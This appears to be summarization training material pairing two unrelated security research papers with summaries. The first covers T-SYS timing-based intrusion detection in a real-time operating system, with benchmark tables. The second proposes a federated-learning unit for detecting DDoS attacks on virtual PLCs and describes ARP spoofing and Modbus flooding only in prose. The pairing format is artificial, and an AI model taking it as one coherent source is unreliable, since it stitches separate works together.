Sometimes, the minimum observed detectable attack stagnates after a certain MaxVuln value. This occurs once the entire task is contained within one region; increasing MaxVuln does not lead to an increase in region length after that, i.e., there is no further loosening of timing bounds as MaxVuln increases. This is seen in Figure 6, which details the maximum observed vulnerability for attacks that occur within the kernel, particularly during mutex releases/acquisition, and context switches as a result of task completion. Results for these kernel paths were obtained from the modified PapaBench task set representing protected user code. The kernel path attacks are graphed separately to indicate that they occur within the kernel (and not user code as previously for PapaBench attacks).
Figure 6: Minimum attack vulnerability vs. MaxVuln for selected kernel paths.
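The measurement procedure above (grow the simulated attack in 5 µsec steps until it is detected on every one of 100 attempts) can be sketched as a small search loop. This is an illustrative Python sketch; `run_trial` is a hypothetical callback representing one simulated attack of the given length against the instrumented task.

```python
def minimum_detectable_attack(run_trial, step=5, attempts=100):
    """Find the smallest attack length (in multiples of `step` usec) that is
    detected on every one of `attempts` runs.

    run_trial(length) -> True if an injected attack of `length` usec
    was detected by T-SYS on that run.
    """
    length = step
    while not all(run_trial(length) for _ in range(attempts)):
        length += step             # grow the simulated attack and retry
    return length
```

The returned value corresponds to the "minimum observed detectable attack" reported per MaxVuln level in Figures 4-6.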
We also remark that one could establish a minimum guaranteed vulnerability if attack vectors were placed in each region and then gradually increased as in our experiment. Such an approach has linear complexity if the BCET can be triggered within a given region and would result in a tighter bound than a given MaxVuln value.
7.2 Performance Impact
The elastic nature of MaxVuln provides a customizable tradeoff between vulnerability and performance for a software implementation of T-SYS. Raising MaxVuln allows for reduced overhead due to less frequent IPs at the cost of increased vulnerability due to laxer timing bounds. Similarly, lowering MaxVuln reduces the vulnerability of the system at the cost of introducing more frequent IPs, and thus greater execution time overhead. In the case of hardware support for T-SYS, time overhead is zero (see Section 4). Execution times reported in Tables 1 and 2 were gathered experimentally and averaged over 50 runs.
As can be seen in Table 1, integrating T-SYS does induce some overhead in execution time, as the unprotected control group always has the lowest execution time. The overhead is highest for the smallest MaxVuln. It consistently drops as MaxVuln is increased. An exception is cnt, which stays level for values of MaxVuln above 2,000. As cnt has a WCET less than 2,000 µsec, for all MaxVuln values above that it still has only one IP at the start of the program, and thus has nearly no overhead. Table 2 displays similar behavior in most entries (for kernel and user tasks). It should be noted that, even for the lowest value of MaxVuln tested (corresponding to the highest overhead), all PapaBench tasks still completed before their deadlines, indicating that enough slack existed within the original, unprotected code base to accommodate significant protection.
MaxVuln (µsec)  unprotected   1000     2000     3000     4000     5000
adpcm           321079        613574   484969   458921   423463   362904
lms             518362        989697   782991   741223   684509   585666
fft             68315         130266   103367   97615    90156    76695
cnt             1981          2601     2226     1991     1992     1990
statemate       295433        563840   446305   422211   390409   334027
edn             147086        280464   221775   209940   193686   166191
qsort-exam      6518          12180    9848     9659     8603     6871
st              426710        813607   642774   609665   562184   481264
Table 1: Average execution time (in µsec) of Malardalen benchmarks for different values of MaxVuln.
MaxVuln (µsec)  unprotected   100   200   300   400   500
navigation      614           1162  921   863   821   685
servo_transmit  186           262   199   201   197   198
autopilot       292           426   385   342   301   305
context_switch  157           197   176   157   158   156
mutex_acquire   245           297   278   246   244   245
mutex_release   221           271   245   223   221   220
Table 2: Average execution time (in µsec) of PapaBench tasks and kernel paths for different values of MaxVuln.
7.3 Comparison with Bellec
We compare T-SYS to Bellec in terms of the number of regions created during instrumentation and the number of regions entered during execution, analogous to instrumentation points executed. For purposes of comparison, the MaxVuln parameter used was the corresponding maximum attack width (MAW) determined by Bellec. For each task, we use this value as a baseline for four separate T-SYS instrumentations: (1) base MaxVuln (T-SYS), (2) 1/2 of base (T-SYS(0.5x)), (3) 2X base (T-SYS(2x)), and (4) 5X base (T-SYS(5x)). This allows us to analyze how T-SYS compares when taking advantage of its elasticity.
Table 3 reports the number of regions created per algorithm. T-SYS creates fewer regions than Bellec for Malardalen tasks for an equivalent MaxVuln (baseline), ranging from 3%-28% depending on code shape. When MaxVuln is cut in half (T-SYS(0.5x)), significantly more regions are created than for base T-SYS or for Bellec.
This is expected, as reducing MaxVuln limits the length of regions.
Task            Base MAW   Bellec   T-SYS   T-SYS(0.5x)   T-SYS(2x)   T-SYS(5x)
adpcm           9007       36       31      74            23          6
lms             1210       47       34      68            17          11
fft             1117       41       38      72            19          12
cnt             274        15       9       17            5           2
statemate       2970       21       19      34            13          7
edn             3155       32       26      49            18          10
qsort-exam      614        25       23      62            14          9
st              8001       18       16      28            9           5
navigation      121        5        5       9             3           1
servo_transmit  93         3        3       5             1           1
autopilot       134        7        6       10            4           1
Table 3: Comparison of Bellec vs T-SYS algorithms, by number of regions created.
When MaxVuln is increased above the base value, the number of regions created drops compared to base instrumentation of both Bellec and T-SYS. With 2X MaxVuln, the drop in region count varies widely (between 23% and 50%) as T-SYS has more rules for region structure than maximum length requirements. Thus, granularity does not always scale linearly with MaxVuln. When increasing MaxVuln to 5X, a consistently large drop is observed in most cases. Notice that smaller tasks from PapaBench are entirely contained within a single region at 5X.
Next, the number of regions encountered dynamically during execution is compared, each of which corresponds to a timer update for the software implementation of both algorithms. In experiments, the Malardalen benchmarks were run to completion while the PapaBench task set ran for 3 seconds, constituting 6 hyperperiods.
Task            Base MAW   Bellec   T-SYS   T-SYS(0.5x)   T-SYS(2x)   T-SYS(5x)
adpcm           9007       14256    12275   24912         6240        1504
lms             1210       407      351     906           241         191
fft             1117       2017     1736    3302          960         580
cnt             274        534      498     1011          278         101
statemate       2970       791      754     1294          452         239
edn             3155       1125     1052    1926          618         348
qsort-exam      614        971      956     1835          572         320
st              8001       640      601     1209          384         198
navigation      121        521      513     1017          221         71
servo_transmit  93         312      254     531           61          61
autopilot       134        548      457     1102          246         87
Table 4: Comparison of Bellec vs T-SYS algorithms, by number of regions entered during execution.
The results of this experiment are depicted in Table 4. T-SYS was observed to have an equivalent or lower number of regions encountered dynamically than Bellec for all benchmarks. Note that the percentage difference between T-SYS and Bellec is lower at runtime than in the static case.
This is due to T-SYS incorporating code paths into adjacent regions in some cases that are less frequently executed. Bellec sometimes creates separate regions for such paths, but since they are hardly executed, the dynamic counts remain nearly the same. Overall, the dynamic region count follows the same trend as the static one: reducing MaxVuln increases it while increasing MaxVuln reduces it. Note that the dynamic region count also stagnates for servo_transmit once the number of regions hits 1, as there is no difference between instrumentation under T-SYS(2x) and T-SYS(5x) for that task.
Overall, the elasticity of our T-SYS approach provides significant savings over Bellec as MaxVuln is increased, which makes T-SYS far more flexible and user-configurable.
8 CONCLUSION
This work has contributed T-SYS, a method for securing real-time applications via monitoring execution time. We have implemented a compiler-based tool for integrating T-SYS into user and kernel code. Timestamp checks are automatically placed at specific locations according to an elastic, user-specified MaxVuln parameter. We have implemented support for T-SYS in a commercial operating system and used the compiler tool to implement protection for benchmark tasks as well as the kernel itself, crossing the user/kernel boundary.
We have compared T-SYS with another state-of-the-art timing-based security method and found that T-SYS is competitive in terms of regions created, as well as in terms of region entry operations executed during runtime, while providing the unique ability of unified protection outside and inside the kernel as well as when crossing kernel boundaries. Overall, T-SYS provides a versatile, user-friendly and elastic environment for enhancing real-time tasks with timed protection, which can complement conventional security means in safety-critical environments with lower overhead than prior work.
ACKNOWLEDGMENT This work was supported in part by NSF grants 1813004 and 1525609.
Summary:
The increasing proliferation of cyber-physical systems in a multitude of applications presents a pressing need for effective methods of securing such devices. Many such systems are subject to tight timing constraints, which are poorly suited to traditional security methods due to the large runtime overhead and execution time variation introduced. However, the regular (and well documented) timing specifications of real-time systems open up new avenues with which such systems can be secured.
This paper contributes T-SYS, a timed-system method of detecting intrusions into real-time systems via timing anomalies. A prototype implementation of T-SYS is integrated into a commercial real-time operating system (RTOS) in order to demonstrate its feasibility. Further, a compiler-based tool is developed to realize a T-SYS implementation with elastic timing bounds. This tool supports integration of T-SYS protection into applications as well as the RTOS kernel itself. Results on an ARM hardware platform with benchmark tasks, including those drawn from an open-source UAV code base, compare T-SYS with another method of timing-based intrusion detection and assess its effectiveness in terms of detecting attacks as they intrude a system.
Summarize:
Index Terms—IIoT, Industry 4.0, Federated Learning, DDoS Detection, vPLC
I. INTRODUCTION
Industry 4.0 aims to break away from the conventional automation pyramid by closely integrating production and business levels through cyber-physical systems (CPSs), which connect physical and virtual worlds. This integration will enable automation systems to become more flexible and intelligent [1]. However, the current industrial landscape is characterized by specialized hardware and software components designed for specific purposes, resulting in a mix of communication technologies within industrial automation. An instance of this would be Programmable Logic Controllers (PLCs), which have the task of regulating tangible procedures by utilizing sensors and actuators to interact with the physical realm. These devices are customized and commissioned for specific applications and use cases, and also employ proprietary hardware and software, often specific to the manufacturer, which makes it challenging to integrate different systems and can lead to vendor lock-in [2].
The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU's MSCA with agreement Number 847577.
Virtual Programmable Logic Controllers (vPLCs) address the limitations of traditional PLCs by utilizing virtualization technology [3]. With vPLCs, deterministic real-time control is executed on virtualized edge servers, and the cloud provides the comprehensive vPLC management interface. This means that vPLCs are not limited to specific hardware and can be easily scaled and modified based on changing requirements. Thus, vPLCs offer increased flexibility, scalability, and cost-effectiveness compared to traditional PLCs.
As the vPLC solution is cloud-based, it supports the integration of production and business levels and offers increased resilience. The VMware Edge Compute Stack (ECS) efficiently manages resources located at the edge according to each vPLC's requirements.
Furthermore, the complete virtualization of PLC controls utilizing the VMware ECS, which facilitates the operation of Virtual Machines (VMs) and containers on standard IT servers at the edge, plays a crucial role in enhancing industrial automation. In summary, vPLCs offer increased flexibility, scalability, and cost-effectiveness compared to traditional PLCs.
However, industrial control systems (ICS), including vPLCs, are vulnerable to cyberattacks that can have severe consequences for critical infrastructure [4]. Attackers aim to compromise vPLC systems by exploiting vulnerabilities in the communication protocols or gaining unauthorized access to one of the systems in the industrial networks. Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks [5] are the major threat to the availability of vPLCs, as they can exhaust system resources and cause downtime. Furthermore, the Modbus/TCP, Profinet/IP, and DNP3 communication protocols used by vPLCs lack built-in security features, making them susceptible to attacks that flood the system with TCP SYN requests.
Conventional security solutions, such as anti-virus software and intrusion detection systems, are not suitable for safeguarding vPLCs as a result of their constrained resources.
2023 IEEE International Conference on Smart Computing (SMARTCOMP), 979-8-3503-2281-1/23/$31.00 ©2023 IEEE, DOI: 10.1109/SMARTCOMP58114.2023.00058
Furthermore, the effectiveness of existing Machine Learning (ML) and Deep Learning (DL) models for detecting such attacks is limited due to the lack of data available for training the model within the industrial site.
Additionally, these isolated models are not equipped to recognize new attack types or variants encountered by other industries, which is critical information as it could potentially affect their industry in the future. Therefore, this research work proposes a solution to address DDoS attacks on vPLCs in industrial settings by utilizing Federated Learning (FL). The solution involves a Federated Learning enabled Threat Intelligence Unit (FedTIU) located along with the vPLC at the VMware ECS. The FedTIU at the ECS acts as a gateway for all requests to the vPLC. The FedTIU uses a trained model to classify each request as either an attack or normal, and with FL, the classification result can be shared with other clients by utilizing a global model.
The rest of the paper is organized as follows: Section 2 describes the background and information related to vPLCs and an overview of the existing state-of-the-art techniques. Section 3 presents the attack scenario and Section 4 describes the proposed approach against DDoS attacks to secure vPLCs. Section 5 concludes this work and also discusses the work in progress for further research.
II. BACKGROUND AND RELATED WORK
This section presents the introduction about vPLCs and also discusses the existing state-of-the-art techniques present in the literature to handle cyber attacks in ICS.
A. About vPLC
Since the 1970s, PLCs have been ubiquitous in ICS, offering control to autonomously regulate industrial processes. The manufacturing sector commonly employs various PLCs to precisely perform I/O controls. However, every PLC has been a specialized single-purpose hardware component that requires a controller unit, making it a bulky and costly element to host on-site. Moreover, it is also quite costly if it needs to be updated once deployed [6]. In recent years, there has been a drive to separate the logic and control functionalities (software) of the PLC from the I/O element (hardware) [3].
This enables the separation of discrete PLCs from the industrial floor and allows the hosting of control functions at the edge (e.g., ECS) in the form of vPLCs [7].
Moreover, modernization of industrial automation components is happening at pace because it is reducing hardware costs by moving to common Information Technology (IT) infrastructure and commodity hardware. It is also improving operational efficiency and reducing cost by allowing the PLC to be remotely programmed and upgraded, eliminating on-site visits of the PLC programmer. A virtualization approach to the PLC and the ability to remotely program the PLC is enabling agility and operational efficiency not possible with the current approach.
For example, Software Defined Automation is hosting an industrial Control-as-a-Service offering, leveraging IEC 61131-3 automation software that allows for the virtualizing of the PLC software logic within a real-time hypervisor [8]. The IT architecture of Control-as-a-Service builds on the cloud computing paradigm, using an on-premise edge compute stack along with network connectivity to the public cloud [9]. Nevertheless, conventional SCADA and the protocols used, such as Modbus/TCP, Profinet/IP, DNP3, etc., play an indispensable role in communication with most PLC devices. Regrettably, most of these protocols have neither security features nor the authentication required to execute remote commands on a control device. Consequently, the vPLC environment is susceptible to cyber-physical attacks.
B. State-of-the-Art Techniques in ICS
In the current state of research, the development of solutions to counter DDoS attacks and other cyber threats against vPLCs is lacking. The relative novelty of vPLCs has not yet drawn significant attention from researchers in this area. Nevertheless, there are some existing solutions that have been proposed by researchers to address cyber threats in traditional ICS.
DDoS attacks targeting ICS systems have been a topic of research for years. Teixeira et al. [10] have examined various types of attacks on control systems that concentrate on disrupting communication between sensors/actuators and a PLC. The protection of PLCs from attacks is challenging due to their limited computing power, resulting in limited research on this topic. In a study by Xiao et al. [11], an approach was introduced for detecting anomalies in PLCs using power consumption data. However, these existing attack detection solutions for PLCs are not applicable for defending vPLCs, because vPLCs are software-based emulations of physical PLCs, and as such, they have different security concerns and limitations than physical PLCs. Therefore, new defense mechanisms and security solutions specifically designed for vPLCs are needed to address the unique security challenges posed by virtualization.
III. ATTACK SCENARIO
The ICS domain faces various attack vectors, but vPLCs are particularly vulnerable due to their integration with cloud computing. Attacks on vPLCs fall into three primary categories: attacks that target availability, confidentiality, and integrity. The present work focuses on the scenario depicted in Figure 1, where an attacker, located outside the industrial facility, exploits a vulnerability of the system (existing within the industry periphery) from the public network to gain access to the industrial system. The attacker can gain access through any public website opened by a worker within the industrial site. Once access is gained, the attacker performs a DDoS attack by sending Modbus/TCP packets to the vPLC at a higher rate than it was designed to handle. This slows down the supporting supervisory functions of the vPLC,
Fig. 1.
Attack scenario considered
including sharing alarms, collecting management records, and re-configuring the I/O hardware element connected to the vPLC. The attacker executes an ARP spoofing attack after gaining internal system access by transmitting fraudulent ARP messages that link the attacker's MAC address to the IP addresses of both the vPLC and the Human Machine Interface (HMI). This enables the attacker to intercept and manipulate network traffic or stop all communication, causing a DoS attack. By executing a DoS attack, the attacker aims to place the system in an unsafe state, hindering the administrative user's ability to supervise or regulate the industrial system. This type of attack is influenced by the approach outlined in [6].
IV. FL ENABLED THREAT INTELLIGENCE UNIT
This section presents the Federated Learning enabled Threat Intelligence Unit to detect DDoS attack requests against vPLCs hosted on the edge compute stack in the manufacturing industry. The system model architecture considered is shown in Figure 2 and consists of different sites of manufacturing industries. Instead of a hardware PLC, each industry uses a vPLC hosted at the ECS. The vPLC processes the requests made by the components of an industrial site. However, DDoS attacks can affect the availability of the vPLC for serving benign requests, as mentioned in Section III.
The proposed FedTIU sits alongside the vPLC at the ECS and consists of three major components: a Threat Analysis Unit (TAU), a Screening and Filtering Unit (SFU), and the aggregator associated with the ARIA cloud. In more detail, the SFU contains a Traffic Policy Database (TPD) and a Filtering Sub-Unit (FISU). The TAU includes an Espy Sub-Unit (ESU), a Local Training Sub-Unit (LTSU), and the Database (DB) to train the local model. The LTSU is responsible for training the local model on the local dataset collected through the ESU. Figure 3 presents the architecture details of the proposed FedTIU.
All incoming traffic is forwarded to the SFU (1).
In the SFU, the TPD forwards it to the FISU (2) or sends it to the TAU for analysis purposes (3) when no policy is available. The ESU classifies the traffic using edge data analysis, responding to the query (4). Meanwhile, the ESU notifies the LTSU of the suspicious flow (5) and stores the traces in the DB. The LTSU uses the reported flow to retrain the global model and sends training results to the ESU (6). The LTSU then distributes policies to the TPD (7) and the FISU (8). Finally, the FISU rejects (9) or sends (10) the flow to access the vPLC.
A. Threat Analysis Unit
The Threat Analysis Unit is responsible for training the local model and predicting new threats. The TAU coordinates with the SFU to respond to new threats and provides policies for them to the TPD and the FISU for future detection. The TAU consists of two major components: (i) the ESU and its associated Database, which is responsible for classifying the request as per edge data analysis and responding to the TPD for the requested query, but does not update the policy; and (ii) the LTSU, another TAU unit responsible for performing the local training on the local data. Here we used a hybrid CNN+GRU+MLP based DL model for training the local model. Whenever the ESU detects a new threat, it notifies the LTSU; the LTSU then retrains the model and shares it with the aggregator for global model aggregation. The training results are then sent to the TPD and FISU to update and store the policies for the future.
B. Screening and Filtering Unit
The SFU is responsible for monitoring and filtering incoming requests as per the defined policies. The SFU consists of two major components: (i) the TPD, which is used to store the policies; whenever a request arrives for the vPLC, it is first checked against the TPD, and if policies exist for such requests they are forwarded to the FISU for filtering; and (ii) the FISU, which filters the traffic as per the traffic policy, i.e., forwards it to the vPLC or rejects the flow.
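The numbered request path above can be sketched as a small Python model. This is a hypothetical sketch: the TPD, FISU, ESU, and LTSU objects are minimal stand-ins, and the flow format, classification rule, and policy strings are illustrative assumptions rather than details from the paper.

```python
class TPD:
    """Traffic Policy Database: flow signature -> 'forward' / 'reject'."""
    def __init__(self):
        self.policies = {}
    def lookup(self, flow):
        return self.policies.get(flow["sig"])

class FISU:
    """Filtering Sub-Unit: applies a policy to a flow."""
    def apply(self, policy, flow):
        return flow if policy == "forward" else None   # (9) reject / (10) forward

class ESU:
    """Espy Sub-Unit: edge data analysis (stubbed with a rate threshold)."""
    def classify(self, flow):
        return "suspicious" if flow["rate"] > 1000 else "benign"

class LTSU:
    """Local Training Sub-Unit: records flagged flows for retraining."""
    def __init__(self):
        self.flagged = []
    def notify(self, flow):                 # (5): store trace, retrain later
        self.flagged.append(flow)

def handle_request(flow, tpd, fisu, esu, ltsu):
    policy = tpd.lookup(flow)               # (1)-(2): SFU checks the policy DB
    if policy is None:                      # (3): no policy -> hand to the TAU
        verdict = esu.classify(flow)        # (4): edge analysis in the ESU
        policy = "reject" if verdict == "suspicious" else "forward"
        if verdict == "suspicious":
            ltsu.notify(flow)
        tpd.policies[flow["sig"]] = policy  # (7)-(8): policy distributed back
    return fisu.apply(policy, flow)         # reject (9) or forward to vPLC (10)
```

Once a policy exists in the TPD, repeat flows with the same signature bypass the TAU entirely, which matches the gateway role the FedTIU plays in front of the vPLC.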
C. Aggregator

The aggregation process is a crucial step in federated learning, in which the model gradients from the different LTSUs are combined to update the global model. In our proposed approach, a scheduler selects participants and sends the global model to them; the participants retrain the model and send the updated models back for aggregation into a new global model.

V. CONCLUSION

There are a number of attack vectors against industrial control systems, but with the adoption of the cloud computing paradigm, vPLCs will now also inherit attacks with a heritage in the Internet world. Additionally, the communication protocols employed by vPLCs lack built-in security measures and do not usually mandate any authentication for executing commands remotely on control devices. The vPLC environment is therefore open to cyber-physical attacks. In this study, our focus is on the DDoS attack, which can affect the availability of vPLC services for their intended users.

235 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply.

Fig. 2. System model architecture
Fig. 3. Architecture of proposed FedTIU approach

Therefore, this work proposed a federated learning enabled Threat Intelligence Unit to detect DDoS attacks against vPLCs hosted on the ECS in the manufacturing industry. The proposed approach consists of three major components: the Threat Analysis Unit, the Screening and Filtering Unit, and the Aggregator. The system model architecture is designed so that, if an attack happens at one site, the local DL models of other industrial sites also learn about it, improving the overall security of the industrial ecosystem. Moreover, the proposed model leverages collaborative learning using FL while ensuring the data privacy of the individual industrial sites.
We are currently working to simulate a similar environment to test the proposed approach and will include the results in our future research.

ACKNOWLEDGMENT

The project is funded by Science Foundation Ireland (SFI) under Grant 16/RC/3918 and the EU's MSCA under agreement number 847577. This work has also received support from the VMware Academic Program. In order to promote open access, the author has chosen to apply a CC BY public copyright license to any version of the Author Accepted Manuscript that results from this submission.
Summary:
Conventional Programmable Logic Controller (PLC) systems are becoming increasingly challenging to manage due to hardware and software dependencies. Moreover, the number and size of conventional PLCs on factory floors continue to increase, and the virtualized PLC (vPLC) offers a solution to these challenges. The utilization of vPLCs offers the advantages of streamlining communication between high-level applications and low-level machine operations, enhancing programmability in process control systems by abstracting control functions from I/O modules, and increasing automation in industrial control networks. Nevertheless, the connection of vPLCs to the internet and cloud services presents a considerable cybersecurity risk, and a crucial aspect of information security for vPLCs is ensuring their availability. Distributed Denial of Service (DDoS) attacks can be particularly devastating for vPLCs, as they rely on internet connectivity to function. DDoS attacks overwhelm a vPLC and cause it to become unavailable. vPLCs manage control systems, and if these systems are targeted by a DDoS attack they could become unresponsive, leading to significant disruption of industrial processes. Thus, implementing effective DDoS protection measures is crucial for ensuring the availability and reliability of vPLCs in industrial settings. Therefore, this work proposes a Federated learning enabled Threat Intelligence Unit (FedTIU) for detecting DDoS attacks on vPLCs, deployed on an Edge Compute Stack near the vPLC. The proposed approach involves collaborative model training using federated learning techniques to gain knowledge of new attack patterns from other industrial sites while maintaining data privacy.